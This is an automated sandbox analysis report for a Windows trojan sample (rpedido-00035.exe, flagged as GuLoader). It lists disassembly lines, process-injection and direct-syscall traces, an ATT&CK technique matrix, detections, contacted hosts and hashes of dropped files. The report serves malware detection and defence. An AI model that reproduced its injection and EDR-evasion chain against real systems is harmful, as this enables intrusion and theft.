            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36008347 mov eax, dword ptr fs:[00000030h]2_2_36008347
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36008347 mov eax, dword ptr fs:[00000030h]2_2_36008347
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604A350 mov eax, dword ptr fs:[00000030h]2_2_3604A350
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601B360 mov eax, dword ptr fs:[00000030h]2_2_3601B360
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601B360 mov eax, dword ptr fs:[00000030h]2_2_3601B360
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601B360 mov eax, dword ptr fs:[00000030h]2_2_3601B360
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601B360 mov eax, dword ptr fs:[00000030h]2_2_3601B360
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601B360 mov eax, dword ptr fs:[00000030h]2_2_3601B360
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3601B360 mov eax, dword ptr fs:[00000030h]2_2_3601B360
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3604E363 mov eax, dword ptr fs:[00000030h]2_2_3604E363
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36090371 mov eax, dword ptr fs:[00000030h]2_2_36090371
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36090371 mov eax, dword ptr fs:[00000030h]2_2_36090371
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3603237A mov eax, dword ptr fs:[00000030h]2_2_3603237A
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E372 mov eax, dword ptr fs:[00000030h]2_2_3608E372
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E372 mov eax, dword ptr fs:[00000030h]2_2_3608E372
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E372 mov eax, dword ptr fs:[00000030h]2_2_3608E372
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3608E372 mov eax, dword ptr fs:[00000030h]2_2_3608E372
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36011380 mov eax, dword ptr fs:[00000030h]2_2_36011380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36011380 mov eax, dword ptr fs:[00000030h]2_2_36011380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36011380 mov eax, dword ptr fs:[00000030h]2_2_36011380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36011380 mov eax, dword ptr fs:[00000030h]2_2_36011380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_36011380 mov eax, dword ptr fs:[00000030h]2_2_36011380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602F380 mov eax, dword ptr fs:[00000030h]2_2_3602F380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602F380 mov eax, dword ptr fs:[00000030h]2_2_3602F380
            Source: C:\Users\user\Desktop\rpedido-00035.exeCode function: 2_2_3602F380 mov eax, dword ptr fs:[00000030h]2_2_3602F380
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3602F380 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360CF38A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3603A390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360193A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3608C3B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3600E3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3600C3C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360163CB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360433D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360443D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360943D5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36035004 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36035004 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36018009 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36052010 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3600D02D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36040044 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36011051 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360E505B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360B9060 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36017072 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_36016074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360E4080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3600C090 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3600A093 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360500A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360CB0AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360BF0A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360E50B7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3602B0D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3600B0D6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3604D0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3604D0F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3600C0F6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_360090F8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 2_2_3603510F mov eax, dword ptr fs:[00000030h]

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x6A5187E
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x6A49C67
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtResumeThread: Direct from: 0x6A49CDE
            Source: C:\Users\user\Desktop\rpedido-00035.exe | NtSetContextThread: Indirect: 0x133829
            Source: C:\Users\user\Desktop\rpedido-00035.exe | NtQueueApcThread: Indirect: 0x12F5AE
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtProtectVirtualMemory: Direct from: 0x7FFB057C2651
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtClose: Direct from: 0x7FFAD4979E7F
            Source: C:\Users\user\Desktop\rpedido-00035.exe | NtSuspendThread: Indirect: 0x133B49
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | NtDelayExecution: Direct from: 0x6A49AA1
            Source: C:\Users\user\Desktop\rpedido-00035.exe | NtResumeThread: Indirect: 0x133E69
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Section loaded: NULL target: C:\Windows\SysWOW64\sethc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write
            Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sethc.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Thread register set: target process: 4296
            Source: C:\Windows\SysWOW64\sethc.exe | Thread register set: target process: 4296
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Process created: C:\Users\user\Desktop\rpedido-00035.exe "C:\Users\user\Desktop\rpedido-00035.exe"
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Process created: C:\Windows\SysWOW64\sethc.exe "C:\Windows\SysWOW64\sethc.exe"
            Source: C:\Users\user\Desktop\rpedido-00035.exe | Code function: 0_2_00403489 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            Source: Yara match | File source: 00000004.00000002.46413796003.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.44867603044.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.46414254627.00000000042D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            OS Credential Dumping121
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
            Process Injection
            2
            Virtualization/Sandbox Evasion
            LSASS Memory2
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Clipboard Data
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism
            1
            Access Token Manipulation
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading
            311
            Process Injection
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets3
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism
            Cached Domain Credentials13
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Behavior Graph ID: 1526071 | Sample: rpedido-00035.exe | Start date: 04/10/2024 | Architecture: WINDOWS | Score: 100
            Start node: contacted domains drive.usercontent.google.com and drive.google.com; signatures: Malicious sample detected (through community Yara rule), Antivirus / Scanner detection for submitted sample, Multi AV Scanner detection for submitted file, 2 other signatures
            rpedido-00035.exe (started): dropped C:\Users\user\AppData\...\Meningorrhoea.Tig (data), C:\Users\user\AppData\Local\...\nszDD94.tmp (data), C:\Users\user\AppData\Local\...\System.dll (PE32); signature: Switches to a custom stack to bypass stack traces
            rpedido-00035.exe (second instance, started by the first): drive.usercontent.google.com 142.250.65.161, port 443, local port 49776, GOOGLEUS, United States; drive.google.com 142.250.65.206, port 443, local port 49775, GOOGLEUS, United States; signatures: Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Queues an APC in another process (thread injection), Found direct / indirect Syscall (likely to bypass EDR)
            RAVCpl64.exe (injected by the second rpedido-00035.exe instance): Found direct / indirect Syscall (likely to bypass EDR)
            sethc.exe (started by RAVCpl64.exe): Modifies the context of a thread in another process (thread injection), Maps a DLL or memory area into another process, Switches to a custom stack to bypass stack traces
            explorer.exe (injected by sethc.exe)

            Source | Detection | Scanner | Label | Link
            rpedido-00035.exe | 100% | Avira | HEUR/AGEN.1331786
            rpedido-00035.exe | 18% | ReversingLabs | Win32.Trojan.InjectorX
            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll | 0% | ReversingLabs
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            drive.google.com | 142.250.65.206 | true | false | | unknown
            drive.usercontent.google.com | 142.250.65.161 | true | false | | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | rpedido-00035.exe, 00000002.00000001.44421584161.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | false | | unknown
            https://www.google.com | rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            http://www.quovadis.bm0 | rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://drive.usercontent.google.com/ | rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | rpedido-00035.exe, 00000002.00000001.44421584161.00000000005F2000.00000020.00000001.01000000.00000007.sdmp | false | | unknown
            https://apis.google.com | rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            http://nsis.sf.net/NSIS_ErrorError | rpedido-00035.exe, 00000000.00000000.43566865335.000000000040A000.00000008.00000001.01000000.00000003.sdmp, rpedido-00035.exe, 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp, rpedido-00035.exe, 00000002.00000000.44420461178.000000000040A000.00000008.00000001.01000000.00000003.sdmp | false | | unknown
            https://drive.gom | rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://drive.google.com/x | rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BF5000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://ocsp.quovadisoffshore.com0 | rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            https://drive.google.com/ | rpedido-00035.exe, 00000002.00000003.44817366771.0000000005BEB000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BF5000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BEC000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            IP | Domain | Country | ASN | ASN Name | Malicious
            142.250.65.206 | drive.google.com | United States | 15169 | GOOGLEUS | false
            142.250.65.161 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1526071
                                      Start date and time:2024-10-04 17:21:31 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 17m 41s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                       Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                                      Run name:Suspected Instruction Hammering
                                       Number of new started processes analysed:4
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:2
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:rpedido-00035.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@5/8@2/2
                                      EGA Information:
                                      • Successful, ratio: 75%
                                      HCA Information:
                                      • Successful, ratio: 88%
                                      • Number of executed functions: 72
                                      • Number of non-executed functions: 294
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                      • Report size getting too big, too many NtOpenKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: rpedido-00035.exe
                                       Time | Type | Description
                                       11:26:25 | API Interceptor | 11101089x Sleep call for process: sethc.exe modified
                                       11:28:49 | API Interceptor | 170x Sleep call for process: explorer.exe modified
                                      No context
                                       Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                       37f463bf4616ecd445d4a1937da06e19 | w2TxCv1zA8.msi | malicious | Unknown | 142.250.65.206, 142.250.65.161
                                       37f463bf4616ecd445d4a1937da06e19 | RNKJUiDSbh.dll | malicious | Unknown | 142.250.65.206, 142.250.65.161
                                       37f463bf4616ecd445d4a1937da06e19 | RNKJUiDSbh.dll | malicious | Unknown | 142.250.65.206, 142.250.65.161
                                       37f463bf4616ecd445d4a1937da06e19 | Setup.exe | malicious | Unknown | 142.250.65.206, 142.250.65.161
                                       37f463bf4616ecd445d4a1937da06e19 | App_installer32_64x.exe | malicious | CredGrabber, Meduza Stealer | 142.250.65.206, 142.250.65.161
                                       37f463bf4616ecd445d4a1937da06e19 | setup_run.exe | malicious | CredGrabber, Meduza Stealer | 142.250.65.206, 142.250.65.161
                                       37f463bf4616ecd445d4a1937da06e19 | presupuesto urgente.exe | malicious | FormBook, GuLoader | 142.250.65.206, 142.250.65.161
                                       37f463bf4616ecd445d4a1937da06e19 | -pdf.bat.exe | malicious | GuLoader | 142.250.65.206, 142.250.65.161
                                       37f463bf4616ecd445d4a1937da06e19 | PEDIDO-144797.exe | malicious | FormBook, GuLoader | 142.250.65.206, 142.250.65.161
                                       37f463bf4616ecd445d4a1937da06e19 | -pdf.bat.exe | malicious | FormBook | 142.250.65.206, 142.250.65.161
                                       Match | Associated Sample Name / URL | Detection | Threat Name
                                       C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll | presupuesto urgente.exe | malicious | FormBook, GuLoader
                                       C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll | presupuesto urgente.exe | malicious | GuLoader
                                       C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll | PEDIDO-144797.exe | malicious | FormBook, GuLoader
                                       C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll | PEDIDO-144797.exe | malicious | GuLoader
                                       C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll | rpedido-002297.exe | malicious | FormBook, GuLoader
                                       C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll | rpedido-002297.exe | malicious | GuLoader
                                       C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll | FACTURA-002297.exe | malicious | FormBook, GuLoader
                                       C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll | FACTURA-002297.exe | malicious | GuLoader
                                       C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll | LisectAVT_2403002A_41.exe | malicious | GuLoader
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11776
                                                        Entropy (8bit):5.659384359264642
                                                        Encrypted:false
                                                        SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                        MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                        SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                        SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                        SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: presupuesto urgente.exe, Detection: malicious
                                                        • Filename: presupuesto urgente.exe, Detection: malicious
                                                        • Filename: PEDIDO-144797.exe, Detection: malicious
                                                        • Filename: PEDIDO-144797.exe, Detection: malicious
                                                        • Filename: rpedido-002297.exe, Detection: malicious
                                                        • Filename: rpedido-002297.exe, Detection: malicious
                                                        • Filename: FACTURA-002297.exe, Detection: malicious
                                                        • Filename: FACTURA-002297.exe, Detection: malicious
                                                        • Filename: LisectAVT_2403002A_41.exe, Detection: malicious
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1359453
                                                        Entropy (8bit):3.8940291804171405
                                                        Encrypted:false
                                                        SSDEEP:12288:uILcPC3smMtXml/a2X5dkLuW9C234VOHubkTNnlXE9YDU0A0K:uILcPC3smMtXmlpAbDUrR
                                                        MD5:D4577FDFDEDA8D46C88C6B0EE3961B20
                                                        SHA1:379039559EAEA6BB71017B8D3E51E7C174F69894
                                                        SHA-256:29120770F9AB1B2E8EA2320318CB0179130D562F2219CA16B7878C7039B3110A
                                                        SHA-512:D836B495B3D7673C17C47ECFB6C73694EE71D0A9FDB05629ABAACB0FF70C8A2C25AA9733B4E252BC3B0CD5594F7DD77AD90669FAF90881235391CD75604E6C64
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nszDD94.tmp, Author: Joe Security
                                                        Reputation:low
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):215183
                                                        Entropy (8bit):7.5201840696098134
                                                        Encrypted:false
                                                        SSDEEP:6144:CHPILcPC3smMtXml/P0v7GrhxM45dgawi3:WILcPC3smMtXml/a2X5dz
                                                        MD5:64599F4C9B26D42A20635DE637BA2F84
                                                        SHA1:2A83C417994B8D0B89B5C67A63D3983ABB93DC68
                                                        SHA-256:9E7102468B7DBAEEBDFBA02CF2C17C5CB93E03640CF9F807922ACB5ECBED7F0A
                                                        SHA-512:908AC8521DD9BDE63E9FD2DBEC00B5F16EC5F92AD23507DB01986F2A0B676E3DE78AD43DBB00BB4803DD48436E25DB2343529FC61065C44F53B799A0815B188E
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\Meningorrhoea.Tig, Author: Joe Security
